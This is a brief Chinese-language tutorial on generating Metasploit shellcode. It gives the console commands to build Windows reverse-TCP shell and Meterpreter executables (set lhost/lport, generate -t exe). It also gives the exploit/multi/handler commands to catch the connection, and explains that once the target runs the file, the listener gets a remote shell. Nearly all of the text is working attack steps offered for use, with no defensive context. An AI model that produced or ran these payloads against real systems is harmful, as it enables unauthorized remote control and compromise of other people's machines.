metasploit几种shellcode类型

  1. 可直接用nc接收的shell
    use payload/windows/x64/shell/reverse_tcp #win64 使用tcp反弹的shellcode
    set lhost ip
    set lport port
    generate -t exe -f d:\1.exe #生成shellcode文件

  2. 使用meterpreter接收的shell
    use payload/windows/meterpreter/reverse_tcp #win 弹meterpreter的shellcode
    set lhost ip
    set lport port
    generate -t exe -f d:\1.exe #生成shellcode文件

生成的文件不关类型,只要让对方服务器执行,且对方服务器可以访问到反弹的ip和端口,便会反弹到设置的ip和port上,只需要监听对应端口即可获得shell
meterpreter监听命令

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp #该处payload可改成对应的payload,该项根据对方执行的shellcode类型
set lhost
set lport
exploit #执行后便会监听设置的端口,如果有访问则获得shell